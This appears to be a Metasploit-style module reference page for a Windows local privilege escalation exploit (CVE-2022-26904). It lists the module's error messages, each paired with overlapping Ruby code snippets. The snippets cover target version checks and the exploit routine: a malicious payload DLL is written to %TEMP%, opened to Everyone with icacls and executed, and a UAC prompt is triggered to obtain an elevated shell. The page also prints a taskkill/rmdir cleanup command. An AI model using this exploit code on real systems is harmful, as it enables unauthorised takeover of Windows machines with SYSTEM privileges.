89: # Non-Windows systems are definitely not affected.
90: return CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!')
91: end
92:
93: # see https://docs.microsoft.com/en-us/windows/release-information/
94: unless sysinfo_value =~ /(7|8|8\.1|10|11|2008|2012|2016|2019|2022|1803|1903|1909|2004)/
95: return CheckCode::Safe('Target is not running a vulnerable version of Windows!')
Target is not running a vulnerable version of Windows!
Here is a relevant code snippet related to the "Target is not running a vulnerable version of Windows!" error message:
90: return CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!')
91: end
92:
93: # see https://docs.microsoft.com/en-us/windows/release-information/
94: unless sysinfo_value =~ /(7|8|8\.1|10|11|2008|2012|2016|2019|2022|1803|1903|1909|2004)/
95: return CheckCode::Safe('Target is not running a vulnerable version of Windows!')
96: end
97:
98: print_status('Checking if PromptOnSecureDesktop mitigation applied...')
99: reg_key = 'HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System'
100: reg_val = 'PromptOnSecureDesktop'
Was not able to retrieve the PromptOnSecureDesktop value. Error was <E>
Here is a relevant code snippet related to the "Was not able to retrieve the PromptOnSecureDesktop value. Error was <E>" error message:
100: reg_val = 'PromptOnSecureDesktop'
101: begin
102: root_key, base_key = @session.sys.registry.splitkey(reg_key)
103: value = @session.sys.registry.query_value_direct(root_key, base_key, reg_val)
104: rescue Rex::Post::Meterpreter::RequestError => e
105: return CheckCode::Unknown("Was not able to retrieve the PromptOnSecureDesktop value. Error was #{e}")
106: end
107:
108: if value.data == 0
109: return CheckCode::Safe('PromptOnSecureDesktop is set to 0, mitigation applied!')
110: elsif value.data == 1
PromptOnSecureDesktop is set to 0, mitigation applied!
Here is a relevant code snippet related to the "PromptOnSecureDesktop is set to 0, mitigation applied!" error message:
104: rescue Rex::Post::Meterpreter::RequestError => e
105: return CheckCode::Unknown("Was not able to retrieve the PromptOnSecureDesktop value. Error was #{e}")
106: end
107:
108: if value.data == 0
109: return CheckCode::Safe('PromptOnSecureDesktop is set to 0, mitigation applied!')
110: elsif value.data == 1
111: print_good('PromptOnSecureDesktop is set to 1, should be safe to proceed!')
112: else
113: return CheckCode::Unknown("PromptOnSecureDesktop was not set to a known value, are you sure the target system isn't corrupted?")
114: end
PromptOnSecureDesktop was not set to a known value, are you sure the target system isn't corrupted?
Here is a relevant code snippet related to the "PromptOnSecureDesktop was not set to a known value, are you sure the target system isn't corrupted?" error message:
108: if value.data == 0
109: return CheckCode::Safe('PromptOnSecureDesktop is set to 0, mitigation applied!')
110: elsif value.data == 1
111: print_good('PromptOnSecureDesktop is set to 1, should be safe to proceed!')
112: else
113: return CheckCode::Unknown("PromptOnSecureDesktop was not set to a known value, are you sure the target system isn't corrupted?")
114: end
115:
116: _major, _minor, build, revision, _branch = file_version('C:\\Windows\\System32\\ntdll.dll')
117: major_minor_version = sysinfo_value.match(/\((\d{1,2}\.\d)/)
118: if major_minor_version.nil?
Could not retrieve the major n minor version of the target's build number!
Here is a relevant code snippet related to the "Could not retrieve the major n minor version of the target's build number!" error message:
114: end
115:
116: _major, _minor, build, revision, _branch = file_version('C:\\Windows\\System32\\ntdll.dll')
117: major_minor_version = sysinfo_value.match(/\((\d{1,2}\.\d)/)
118: if major_minor_version.nil?
119: return CheckCode::Unknown("Could not retrieve the major n minor version of the target's build number!")
120: end
121:
122: major_minor_version = major_minor_version[1]
123: build_num = "#{major_minor_version}.#{build}.#{revision}"
124:
Vulnerable Windows 11 build detected!
Here is a relevant code snippet related to the "Vulnerable Windows 11 build detected!" error message:
125: build_num_gemversion = Rex::Version.new(build_num)
126:
127: # Build numbers taken from https://www.gaijin.at/en/infos/windows-version-numbers and from
128: # https://en.wikipedia.org/wiki/Windows_11_version_history and https://en.wikipedia.org/wiki/Windows_10_version_history
129: if (build_num_gemversion >= Rex::Version.new('10.0.22000.0')) # Windows 11
130: return CheckCode::Appears('Vulnerable Windows 11 build detected!')
131: elsif (build_num_gemversion >= Rex::Version.new('10.0.20348.0')) # Windows Server 2022
132: return CheckCode::Appears('Vulnerable Windows 11 build detected!')
133: elsif (build_num_gemversion >= Rex::Version.new('10.0.19044.0')) # Windows 10 21H2
134: return CheckCode::Appears('Vulnerable Windows 10 21H2 build detected!')
135: elsif (build_num_gemversion >= Rex::Version.new('10.0.19043.0')) # Windows 10 21H1
Vulnerable Windows 11 build detected!
Here is a relevant code snippet related to the "Vulnerable Windows 11 build detected!" error message:
127: # Build numbers taken from https://www.gaijin.at/en/infos/windows-version-numbers and from
128: # https://en.wikipedia.org/wiki/Windows_11_version_history and https://en.wikipedia.org/wiki/Windows_10_version_history
129: if (build_num_gemversion >= Rex::Version.new('10.0.22000.0')) # Windows 11
130: return CheckCode::Appears('Vulnerable Windows 11 build detected!')
131: elsif (build_num_gemversion >= Rex::Version.new('10.0.20348.0')) # Windows Server 2022
132: return CheckCode::Appears('Vulnerable Windows 11 build detected!')
133: elsif (build_num_gemversion >= Rex::Version.new('10.0.19044.0')) # Windows 10 21H2
134: return CheckCode::Appears('Vulnerable Windows 10 21H2 build detected!')
135: elsif (build_num_gemversion >= Rex::Version.new('10.0.19043.0')) # Windows 10 21H1
136: target_not_presently_supported
137: return CheckCode::Appears('Vulnerable Windows 10 21H1 build detected!')
Vulnerable Windows 10 21H2 build detected!
Here is a relevant code snippet related to the "Vulnerable Windows 10 21H2 build detected!" error message:
129: if (build_num_gemversion >= Rex::Version.new('10.0.22000.0')) # Windows 11
130: return CheckCode::Appears('Vulnerable Windows 11 build detected!')
131: elsif (build_num_gemversion >= Rex::Version.new('10.0.20348.0')) # Windows Server 2022
132: return CheckCode::Appears('Vulnerable Windows 11 build detected!')
133: elsif (build_num_gemversion >= Rex::Version.new('10.0.19044.0')) # Windows 10 21H2
134: return CheckCode::Appears('Vulnerable Windows 10 21H2 build detected!')
135: elsif (build_num_gemversion >= Rex::Version.new('10.0.19043.0')) # Windows 10 21H1
136: target_not_presently_supported
137: return CheckCode::Appears('Vulnerable Windows 10 21H1 build detected!')
138: elsif (build_num_gemversion >= Rex::Version.new('10.0.19042.0')) # Windows 10 20H2 / Windows Server, Version 20H2
139: target_not_presently_supported
Vulnerable Windows 10 21H1 build detected!
Here is a relevant code snippet related to the "Vulnerable Windows 10 21H1 build detected!" error message:
132: return CheckCode::Appears('Vulnerable Windows 11 build detected!')
133: elsif (build_num_gemversion >= Rex::Version.new('10.0.19044.0')) # Windows 10 21H2
134: return CheckCode::Appears('Vulnerable Windows 10 21H2 build detected!')
135: elsif (build_num_gemversion >= Rex::Version.new('10.0.19043.0')) # Windows 10 21H1
136: target_not_presently_supported
137: return CheckCode::Appears('Vulnerable Windows 10 21H1 build detected!')
138: elsif (build_num_gemversion >= Rex::Version.new('10.0.19042.0')) # Windows 10 20H2 / Windows Server, Version 20H2
139: target_not_presently_supported
140: return CheckCode::Appears('Vulnerable Windows 10 20H2 build detected!')
141: elsif (build_num_gemversion >= Rex::Version.new('10.0.19041.0')) # Windows 10 v2004 / Windows Server v2004
142: target_not_presently_supported
Vulnerable Windows 10 20H2 build detected!
Here is a relevant code snippet related to the "Vulnerable Windows 10 20H2 build detected!" error message:
135: elsif (build_num_gemversion >= Rex::Version.new('10.0.19043.0')) # Windows 10 21H1
136: target_not_presently_supported
137: return CheckCode::Appears('Vulnerable Windows 10 21H1 build detected!')
138: elsif (build_num_gemversion >= Rex::Version.new('10.0.19042.0')) # Windows 10 20H2 / Windows Server, Version 20H2
139: target_not_presently_supported
140: return CheckCode::Appears('Vulnerable Windows 10 20H2 build detected!')
141: elsif (build_num_gemversion >= Rex::Version.new('10.0.19041.0')) # Windows 10 v2004 / Windows Server v2004
142: target_not_presently_supported
143: return CheckCode::Appears('Vulnerable Windows 10 v2004 build detected!')
144: elsif (build_num_gemversion >= Rex::Version.new('10.0.18363.0')) # Windows 10 v1909 / Windows Server v1909
145: target_not_presently_supported
Vulnerable Windows 10 v2004 build detected!
Here is a relevant code snippet related to the "Vulnerable Windows 10 v2004 build detected!" error message:
138: elsif (build_num_gemversion >= Rex::Version.new('10.0.19042.0')) # Windows 10 20H2 / Windows Server, Version 20H2
139: target_not_presently_supported
140: return CheckCode::Appears('Vulnerable Windows 10 20H2 build detected!')
141: elsif (build_num_gemversion >= Rex::Version.new('10.0.19041.0')) # Windows 10 v2004 / Windows Server v2004
142: target_not_presently_supported
143: return CheckCode::Appears('Vulnerable Windows 10 v2004 build detected!')
144: elsif (build_num_gemversion >= Rex::Version.new('10.0.18363.0')) # Windows 10 v1909 / Windows Server v1909
145: target_not_presently_supported
146: return CheckCode::Appears('Vulnerable Windows 10 v1909 build detected!')
147: elsif (build_num_gemversion >= Rex::Version.new('10.0.18362.0')) # Windows 10 v1903
148: target_not_presently_supported
Vulnerable Windows 10 v1909 build detected!
Here is a relevant code snippet related to the "Vulnerable Windows 10 v1909 build detected!" error message:
141: elsif (build_num_gemversion >= Rex::Version.new('10.0.19041.0')) # Windows 10 v2004 / Windows Server v2004
142: target_not_presently_supported
143: return CheckCode::Appears('Vulnerable Windows 10 v2004 build detected!')
144: elsif (build_num_gemversion >= Rex::Version.new('10.0.18363.0')) # Windows 10 v1909 / Windows Server v1909
145: target_not_presently_supported
146: return CheckCode::Appears('Vulnerable Windows 10 v1909 build detected!')
147: elsif (build_num_gemversion >= Rex::Version.new('10.0.18362.0')) # Windows 10 v1903
148: target_not_presently_supported
149: return CheckCode::Appears('Vulnerable Windows 10 v1903 build detected!')
150: elsif (build_num_gemversion >= Rex::Version.new('10.0.17763.0')) # Windows 10 v1809 / Windows Server 2019 v1809
151: target_not_presently_supported
Vulnerable Windows 10 v1903 build detected!
Here is a relevant code snippet related to the "Vulnerable Windows 10 v1903 build detected!" error message:
144: elsif (build_num_gemversion >= Rex::Version.new('10.0.18363.0')) # Windows 10 v1909 / Windows Server v1909
145: target_not_presently_supported
146: return CheckCode::Appears('Vulnerable Windows 10 v1909 build detected!')
147: elsif (build_num_gemversion >= Rex::Version.new('10.0.18362.0')) # Windows 10 v1903
148: target_not_presently_supported
149: return CheckCode::Appears('Vulnerable Windows 10 v1903 build detected!')
150: elsif (build_num_gemversion >= Rex::Version.new('10.0.17763.0')) # Windows 10 v1809 / Windows Server 2019 v1809
151: target_not_presently_supported
152: return CheckCode::Appears('Vulnerable Windows 10 v1809 build detected!')
153: elsif (build_num_gemversion >= Rex::Version.new('10.0.17134.0')) # Windows 10 v1803
154: target_not_presently_supported
Vulnerable Windows 10 v1809 build detected!
Here is a relevant code snippet related to the "Vulnerable Windows 10 v1809 build detected!" error message:
147: elsif (build_num_gemversion >= Rex::Version.new('10.0.18362.0')) # Windows 10 v1903
148: target_not_presently_supported
149: return CheckCode::Appears('Vulnerable Windows 10 v1903 build detected!')
150: elsif (build_num_gemversion >= Rex::Version.new('10.0.17763.0')) # Windows 10 v1809 / Windows Server 2019 v1809
151: target_not_presently_supported
152: return CheckCode::Appears('Vulnerable Windows 10 v1809 build detected!')
153: elsif (build_num_gemversion >= Rex::Version.new('10.0.17134.0')) # Windows 10 v1803
154: target_not_presently_supported
155: return CheckCode::Appears('Vulnerable Windows 10 v1803 build detected!')
156: elsif (build_num_gemversion >= Rex::Version.new('10.0.16299.0')) # Windows 10 v1709
157: target_not_presently_supported
Vulnerable Windows 10 v1803 build detected!
Here is a relevant code snippet related to the "Vulnerable Windows 10 v1803 build detected!" error message:
150: elsif (build_num_gemversion >= Rex::Version.new('10.0.17763.0')) # Windows 10 v1809 / Windows Server 2019 v1809
151: target_not_presently_supported
152: return CheckCode::Appears('Vulnerable Windows 10 v1809 build detected!')
153: elsif (build_num_gemversion >= Rex::Version.new('10.0.17134.0')) # Windows 10 v1803
154: target_not_presently_supported
155: return CheckCode::Appears('Vulnerable Windows 10 v1803 build detected!')
156: elsif (build_num_gemversion >= Rex::Version.new('10.0.16299.0')) # Windows 10 v1709
157: target_not_presently_supported
158: return CheckCode::Appears('Vulnerable Windows 10 v1709 build detected!')
159: elsif (build_num_gemversion >= Rex::Version.new('10.0.15063.0')) # Windows 10 v1703
160: target_not_presently_supported
Vulnerable Windows 10 v1709 build detected!
Here is a relevant code snippet related to the "Vulnerable Windows 10 v1709 build detected!" error message:
153: elsif (build_num_gemversion >= Rex::Version.new('10.0.17134.0')) # Windows 10 v1803
154: target_not_presently_supported
155: return CheckCode::Appears('Vulnerable Windows 10 v1803 build detected!')
156: elsif (build_num_gemversion >= Rex::Version.new('10.0.16299.0')) # Windows 10 v1709
157: target_not_presently_supported
158: return CheckCode::Appears('Vulnerable Windows 10 v1709 build detected!')
159: elsif (build_num_gemversion >= Rex::Version.new('10.0.15063.0')) # Windows 10 v1703
160: target_not_presently_supported
161: return CheckCode::Appears('Vulnerable Windows 10 v1703 build detected!')
162: elsif (build_num_gemversion >= Rex::Version.new('10.0.14393.0')) # Windows 10 v1607 / Windows Server 2016 v1607
163: target_not_presently_supported
Vulnerable Windows 10 v1703 build detected!
Here is a relevant code snippet related to the "Vulnerable Windows 10 v1703 build detected!" error message:
156: elsif (build_num_gemversion >= Rex::Version.new('10.0.16299.0')) # Windows 10 v1709
157: target_not_presently_supported
158: return CheckCode::Appears('Vulnerable Windows 10 v1709 build detected!')
159: elsif (build_num_gemversion >= Rex::Version.new('10.0.15063.0')) # Windows 10 v1703
160: target_not_presently_supported
161: return CheckCode::Appears('Vulnerable Windows 10 v1703 build detected!')
162: elsif (build_num_gemversion >= Rex::Version.new('10.0.14393.0')) # Windows 10 v1607 / Windows Server 2016 v1607
163: target_not_presently_supported
164: return CheckCode::Appears('Vulnerable Windows 10 v1607 build detected!')
165: elsif (build_num_gemversion >= Rex::Version.new('10.0.10586.0')) # Windows 10 v1511
166: target_not_presently_supported
Vulnerable Windows 10 v1607 build detected!
Here is a relevant code snippet related to the "Vulnerable Windows 10 v1607 build detected!" error message:
159: elsif (build_num_gemversion >= Rex::Version.new('10.0.15063.0')) # Windows 10 v1703
160: target_not_presently_supported
161: return CheckCode::Appears('Vulnerable Windows 10 v1703 build detected!')
162: elsif (build_num_gemversion >= Rex::Version.new('10.0.14393.0')) # Windows 10 v1607 / Windows Server 2016 v1607
163: target_not_presently_supported
164: return CheckCode::Appears('Vulnerable Windows 10 v1607 build detected!')
165: elsif (build_num_gemversion >= Rex::Version.new('10.0.10586.0')) # Windows 10 v1511
166: target_not_presently_supported
167: return CheckCode::Appears('Vulnerable Windows 10 v1511 build detected!')
168: elsif (build_num_gemversion >= Rex::Version.new('10.0.10240.0')) # Windows 10 v1507
169: target_not_presently_supported
Vulnerable Windows 10 v1511 build detected!
Here is a relevant code snippet related to the "Vulnerable Windows 10 v1511 build detected!" error message:
162: elsif (build_num_gemversion >= Rex::Version.new('10.0.14393.0')) # Windows 10 v1607 / Windows Server 2016 v1607
163: target_not_presently_supported
164: return CheckCode::Appears('Vulnerable Windows 10 v1607 build detected!')
165: elsif (build_num_gemversion >= Rex::Version.new('10.0.10586.0')) # Windows 10 v1511
166: target_not_presently_supported
167: return CheckCode::Appears('Vulnerable Windows 10 v1511 build detected!')
168: elsif (build_num_gemversion >= Rex::Version.new('10.0.10240.0')) # Windows 10 v1507
169: target_not_presently_supported
170: return CheckCode::Appears('Vulnerable Windows 10 v1507 build detected!')
171: elsif (build_num_gemversion >= Rex::Version.new('6.3.9600.0')) # Windows 8.1/Windows Server 2012 R2
172: target_not_presently_supported
Vulnerable Windows 10 v1507 build detected!
Here is a relevant code snippet related to the "Vulnerable Windows 10 v1507 build detected!" error message:
165: elsif (build_num_gemversion >= Rex::Version.new('10.0.10586.0')) # Windows 10 v1511
166: target_not_presently_supported
167: return CheckCode::Appears('Vulnerable Windows 10 v1511 build detected!')
168: elsif (build_num_gemversion >= Rex::Version.new('10.0.10240.0')) # Windows 10 v1507
169: target_not_presently_supported
170: return CheckCode::Appears('Vulnerable Windows 10 v1507 build detected!')
171: elsif (build_num_gemversion >= Rex::Version.new('6.3.9600.0')) # Windows 8.1/Windows Server 2012 R2
172: target_not_presently_supported
173: return CheckCode::Appears('Vulnerable Windows 8.1/Windows Server 2012 R2 build detected!')
174: elsif (build_num_gemversion >= Rex::Version.new('6.2.9200.0')) # Windows 8/Windows Server 2012
175: target_not_presently_supported
Vulnerable Windows 8.1/Windows Server 2012 R2 build detected!
Here is a relevant code snippet related to the "Vulnerable Windows 8.1/Windows Server 2012 R2 build detected!" error message:
168: elsif (build_num_gemversion >= Rex::Version.new('10.0.10240.0')) # Windows 10 v1507
169: target_not_presently_supported
170: return CheckCode::Appears('Vulnerable Windows 10 v1507 build detected!')
171: elsif (build_num_gemversion >= Rex::Version.new('6.3.9600.0')) # Windows 8.1/Windows Server 2012 R2
172: target_not_presently_supported
173: return CheckCode::Appears('Vulnerable Windows 8.1/Windows Server 2012 R2 build detected!')
174: elsif (build_num_gemversion >= Rex::Version.new('6.2.9200.0')) # Windows 8/Windows Server 2012
175: target_not_presently_supported
176: return CheckCode::Appears('Vulnerable Windows 8/Windows Server 2012 build detected!')
177: elsif (build_num_gemversion >= Rex::Version.new('6.1.7601.0')) # Windows 7 SP1/Windows Server 2008 R2 SP1
178: target_not_presently_supported
Vulnerable Windows 8/Windows Server 2012 build detected!
Here is a relevant code snippet related to the "Vulnerable Windows 8/Windows Server 2012 build detected!" error message:
171: elsif (build_num_gemversion >= Rex::Version.new('6.3.9600.0')) # Windows 8.1/Windows Server 2012 R2
172: target_not_presently_supported
173: return CheckCode::Appears('Vulnerable Windows 8.1/Windows Server 2012 R2 build detected!')
174: elsif (build_num_gemversion >= Rex::Version.new('6.2.9200.0')) # Windows 8/Windows Server 2012
175: target_not_presently_supported
176: return CheckCode::Appears('Vulnerable Windows 8/Windows Server 2012 build detected!')
177: elsif (build_num_gemversion >= Rex::Version.new('6.1.7601.0')) # Windows 7 SP1/Windows Server 2008 R2 SP1
178: target_not_presently_supported
179: return CheckCode::Appears('Vulnerable Windows 7/Windows Server 2008 R2 build detected!')
180: elsif (build_num_gemversion >= Rex::Version.new('6.1.7600.0')) # Windows 7/Windows Server 2008 R2
181: target_not_presently_supported
Vulnerable Windows 7/Windows Server 2008 R2 build detected!
Here is a relevant code snippet related to the "Vulnerable Windows 7/Windows Server 2008 R2 build detected!" error message:
174: elsif (build_num_gemversion >= Rex::Version.new('6.2.9200.0')) # Windows 8/Windows Server 2012
175: target_not_presently_supported
176: return CheckCode::Appears('Vulnerable Windows 8/Windows Server 2012 build detected!')
177: elsif (build_num_gemversion >= Rex::Version.new('6.1.7601.0')) # Windows 7 SP1/Windows Server 2008 R2 SP1
178: target_not_presently_supported
179: return CheckCode::Appears('Vulnerable Windows 7/Windows Server 2008 R2 build detected!')
180: elsif (build_num_gemversion >= Rex::Version.new('6.1.7600.0')) # Windows 7/Windows Server 2008 R2
181: target_not_presently_supported
182: return CheckCode::Appears('Vulnerable Windows 7/Windows Server 2008 R2 build detected!')
183: elsif (build_num_gemversion >= Rex::Version.new('6.0.6002.0')) # Windows Server 2008 SP2
184: target_not_presently_supported
Vulnerable Windows 7/Windows Server 2008 R2 build detected!
Here is a relevant code snippet related to the "Vulnerable Windows 7/Windows Server 2008 R2 build detected!" error message:
177: elsif (build_num_gemversion >= Rex::Version.new('6.1.7601.0')) # Windows 7 SP1/Windows Server 2008 R2 SP1
178: target_not_presently_supported
179: return CheckCode::Appears('Vulnerable Windows 7/Windows Server 2008 R2 build detected!')
180: elsif (build_num_gemversion >= Rex::Version.new('6.1.7600.0')) # Windows 7/Windows Server 2008 R2
181: target_not_presently_supported
182: return CheckCode::Appears('Vulnerable Windows 7/Windows Server 2008 R2 build detected!')
183: elsif (build_num_gemversion >= Rex::Version.new('6.0.6002.0')) # Windows Server 2008 SP2
184: target_not_presently_supported
185: return CheckCode::Appears('Windows Server 2008/Windows Server 2008 SP2 build detected!')
186: else
187: return CheckCode::Safe('The build number of the target machine does not appear to be a vulnerable version!')
Windows Server 2008/Windows Server 2008 SP2 build detected!
Here is a relevant code snippet related to the "Windows Server 2008/Windows Server 2008 SP2 build detected!" error message:
180: elsif (build_num_gemversion >= Rex::Version.new('6.1.7600.0')) # Windows 7/Windows Server 2008 R2
181: target_not_presently_supported
182: return CheckCode::Appears('Vulnerable Windows 7/Windows Server 2008 R2 build detected!')
183: elsif (build_num_gemversion >= Rex::Version.new('6.0.6002.0')) # Windows Server 2008 SP2
184: target_not_presently_supported
185: return CheckCode::Appears('Windows Server 2008/Windows Server 2008 SP2 build detected!')
186: else
187: return CheckCode::Safe('The build number of the target machine does not appear to be a vulnerable version!')
188: end
189: end
190:
The build number of the target machine does not appear to be a vulnerable version!
Here is a relevant code snippet related to the "The build number of the target machine does not appear to be a vulnerable version!" error message:
182: return CheckCode::Appears('Vulnerable Windows 7/Windows Server 2008 R2 build detected!')
183: elsif (build_num_gemversion >= Rex::Version.new('6.0.6002.0')) # Windows Server 2008 SP2
184: target_not_presently_supported
185: return CheckCode::Appears('Windows Server 2008/Windows Server 2008 SP2 build detected!')
186: else
187: return CheckCode::Safe('The build number of the target machine does not appear to be a vulnerable version!')
188: end
189: end
190:
191: def target_not_presently_supported
192: print_warning('This target is not presently supported by this exploit. Support may be added in the future!')
This target is not presently supported by this exploit. Support may be added in the future!
Here is a relevant code snippet related to the "This target is not presently supported by this exploit. Support may be added in the future!" error message:
187: return CheckCode::Safe('The build number of the target machine does not appear to be a vulnerable version!')
188: end
189: end
190:
191: def target_not_presently_supported
192: print_warning('This target is not presently supported by this exploit. Support may be added in the future!')
193: print_warning('Attempts to exploit this target with this module WILL NOT WORK!')
194: end
195:
196: def check_target_is_running_supported_windows_version
197: if !sysinfo['OS'].include?('Windows')
Attempts to exploit this target with this module WILL NOT WORK!
Here is a relevant code snippet related to the "Attempts to exploit this target with this module WILL NOT WORK!" error message:
188: end
189: end
190:
191: def target_not_presently_supported
192: print_warning('This target is not presently supported by this exploit. Support may be added in the future!')
193: print_warning('Attempts to exploit this target with this module WILL NOT WORK!')
194: end
195:
196: def check_target_is_running_supported_windows_version
197: if !sysinfo['OS'].include?('Windows')
198: fail_with(Failure::NotVulnerable, 'Target is not running Windows!')
Target is not running Windows!
Here is a relevant code snippet related to the "Target is not running Windows!" error message:
193: print_warning('Attempts to exploit this target with this module WILL NOT WORK!')
194: end
195:
196: def check_target_is_running_supported_windows_version
197: if !sysinfo['OS'].include?('Windows')
198: fail_with(Failure::NotVulnerable, 'Target is not running Windows!')
199: elsif !sysinfo['OS'].include?('Windows 10') && !sysinfo['OS'].include?('Windows 11') && !sysinfo['OS'].include?('Windows Server 2022')
200: fail_with(Failure::NoTarget, 'Target is running Windows, its not a version this module supports! Bailing...')
201: end
202: end
203:
Target is running Windows, its not a version this module supports! Bailing...
Here is a relevant code snippet related to the "Target is running Windows, its not a version this module supports! Bailing..." error message:
195:
196: def check_target_is_running_supported_windows_version
197: if !sysinfo['OS'].include?('Windows')
198: fail_with(Failure::NotVulnerable, 'Target is not running Windows!')
199: elsif !sysinfo['OS'].include?('Windows 10') && !sysinfo['OS'].include?('Windows 11') && !sysinfo['OS'].include?('Windows Server 2022')
200: fail_with(Failure::NoTarget, 'Target is running Windows, its not a version this module supports! Bailing...')
201: end
202: end
203:
204: def exploit
205: # Step 1: Check target environment is correct.
Session is already elevated
Here is a relevant code snippet related to the "Session is already elevated" error message:
203:
204: def exploit
205: # Step 1: Check target environment is correct.
206: print_status('Step #1: Checking target environment...')
207: if is_system?
208: fail_with(Failure::None, 'Session is already elevated')
209: end
210: check_target_is_running_supported_windows_version
211:
212: # Step 2: Generate the malicious DLL and upload it to a temp location.
213: payload_dll = generate_payload_dll
Marking DLL as full access for Everyone so that there are no access issues as the secondary user...
Here is a relevant code snippet related to the "Marking DLL as full access for Everyone so that there are no access issues as the secondary user..." error message:
215: temp_directory = session.sys.config.getenv('%TEMP%')
216: malicious_dll_location = "#{temp_directory}\\#{Rex::Text.rand_text_alpha(6..13)}.dll"
217: print_status("Writing malicious DLL to #{malicious_dll_location}")
218: write_file(malicious_dll_location, payload_dll)
219:
220: print_status('Marking DLL as full access for Everyone so that there are no access issues as the secondary user...')
221: cmd_exec("icacls #{malicious_dll_location} /grant Everyone:(F)")
222: register_file_for_cleanup(malicious_dll_location)
223:
224: # Register the directories we create for cleanup
225: register_dir_for_cleanup('C:\\Windows\\System32\\Narrator.exe.Local')
Cleanup may not occur automatically if you aren't using a Meterpreter payload so make sure to run the following command upon session completion
Here is a relevant code snippet related to the "Cleanup may not occur automatically if you aren't using a Meterpreter payload so make sure to run the following command upon session completion" error message:
236: # invoke the exploit, passing in the address of the payload that
237: # we want invoked on successful exploitation, and the credentials for the second user.
238: execute_dll(library_path, dll_info_parameter)
239:
240: print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
241: print_warning("Cleanup may not occur automatically if you aren't using a Meterpreter payload so make sure to run the following command upon session completion:")
242: print_warning('taskkill /IM "consent.exe" /F || taskkill /IM "narrator.exe" /F || taskkill /IM "narratorquickstart.exe" /F || taskkill /IM "msiexec.exe" || rmdir /q /s C:\Users\TEMP || rmdir /q /s C:\Windows\System32\Narrator.exe.local')
243: print_warning('You may need to run this more than once to ensure these files are properly deleted and Narrator.exe actually closes!')
244:
245: print_status('Sleeping for 60 seconds before trying to spawn UserAccountControlSettings.exe as a backup.')
246: print_status('If you get a shell back before this, feel free to CTRL+C once the shell has successfully returned.')
taskkill /IM "consent.exe" /F || taskkill /IM "narrator.exe" /F || taskkill /IM "narratorquickstart.exe" /F || taskkill /IM "msiexec.exe" || rmdir /q /s C:UsersTEMP || rmdir /q /s C:WindowsSystem32Narrator.exe.local
Here is a relevant code snippet related to the "taskkill /IM "consent.exe" /F || taskkill /IM "narrator.exe" /F || taskkill /IM "narratorquickstart.exe" /F || taskkill /IM "msiexec.exe" || rmdir /q /s C:UsersTEMP || rmdir /q /s C:WindowsSystem32Narrator.exe.local" error message:
237: # we want invoked on successful exploitation, and the credentials for the second user.
238: execute_dll(library_path, dll_info_parameter)
239:
240: print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
241: print_warning("Cleanup may not occur automatically if you aren't using a Meterpreter payload so make sure to run the following command upon session completion:")
242: print_warning('taskkill /IM "consent.exe" /F || taskkill /IM "narrator.exe" /F || taskkill /IM "narratorquickstart.exe" /F || taskkill /IM "msiexec.exe" || rmdir /q /s C:\Users\TEMP || rmdir /q /s C:\Windows\System32\Narrator.exe.local')
243: print_warning('You may need to run this more than once to ensure these files are properly deleted and Narrator.exe actually closes!')
244:
245: print_status('Sleeping for 60 seconds before trying to spawn UserAccountControlSettings.exe as a backup.')
246: print_status('If you get a shell back before this, feel free to CTRL+C once the shell has successfully returned.')
247: sleep(60)
You may need to run this more than once to ensure these files are properly deleted and Narrator.exe actually closes!
Here is a relevant code snippet related to the "You may need to run this more than once to ensure these files are properly deleted and Narrator.exe actually closes!" error message:
238: execute_dll(library_path, dll_info_parameter)
239:
240: print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
241: print_warning("Cleanup may not occur automatically if you aren't using a Meterpreter payload so make sure to run the following command upon session completion:")
242: print_warning('taskkill /IM "consent.exe" /F || taskkill /IM "narrator.exe" /F || taskkill /IM "narratorquickstart.exe" /F || taskkill /IM "msiexec.exe" || rmdir /q /s C:\Users\TEMP || rmdir /q /s C:\Windows\System32\Narrator.exe.local')
243: print_warning('You may need to run this more than once to ensure these files are properly deleted and Narrator.exe actually closes!')
244:
245: print_status('Sleeping for 60 seconds before trying to spawn UserAccountControlSettings.exe as a backup.')
246: print_status('If you get a shell back before this, feel free to CTRL+C once the shell has successfully returned.')
247: sleep(60)
248: if (@session_obtained_bool == false)
Will need to get user to click on the flashing icon in the taskbar to open the UAC prompt and give us shells!
Here is a relevant code snippet related to the "Will need to get user to click on the flashing icon in the taskbar to open the UAC prompt and give us shells!" error message:
249: # Execute a command that requires elevation to cause the UAC prompt to appear. For some reason the DLL code itself
250: # triggering the UAC prompt won't work at times so this is the best way of solving this issue for cases where this happens.
251: begin
252: cmd_exec('UserAccountControlSettings.exe')
253: rescue Rex::TimeoutError
254: print_warning('Will need to get user to click on the flashing icon in the taskbar to open the UAC prompt and give us shells!')
255: end
256: end
257: end
258:
259: def on_new_session(new_session)
Go back to menu.
Related Pull Requests
- #16530 Merged Pull Request: Update PiHole module to not wait for sudo input
- #16514 Merged Pull Request: Add Zoneminder lang exec module
- #16445 Merged Pull Request: Add support for Meterpreter logging to file
- #16525 Merged Pull Request: Fix VMware Workspace ONE Access CVE-2022-22954
- #16462 Merged Pull Request: gdb_server_exec: Cleanup and add support for armle/aarch64 architectures
- #16512 Merged Pull Request: Add VMware Workspace ONE Access CVE-2022-22954
References
- CVE-2022-26904
- https://github.com/rmusser01/SuperProfile
- https://web.archive.org/web/20220222105232/https://halove23.blogspot.com/2022/02/blog-post.html
- https://github.com/klinix5/ProfSvcLPE/blob/main/write-up.docx
See Also
Check also the following modules related to this module:
- exploit/windows/local/cve_2017_8464_lnk_lpe
- exploit/windows/local/cve_2018_8453_win32k_priv_esc
- exploit/windows/local/cve_2019_1458_wizardopium
- exploit/windows/local/cve_2020_0668_service_tracing
- exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move
- exploit/windows/local/cve_2020_0796_smbghost
- exploit/windows/local/cve_2020_1048_printerdemon
- exploit/windows/local/cve_2020_1054_drawiconex_lpe
- exploit/windows/local/cve_2020_1313_system_orchestrator
- exploit/windows/local/cve_2020_1337_printerdemon
- exploit/windows/local/cve_2020_17136
- exploit/windows/local/cve_2021_1732_win32k
- exploit/windows/local/cve_2021_21551_dbutil_memmove
- exploit/windows/local/cve_2021_40449
- exploit/windows/local/cve_2022_21882_win32k
- exploit/windows/local/cve_2022_21999_spoolfool_privesc
- exploit/windows/dcerpc/cve_2021_1675_printnightmare
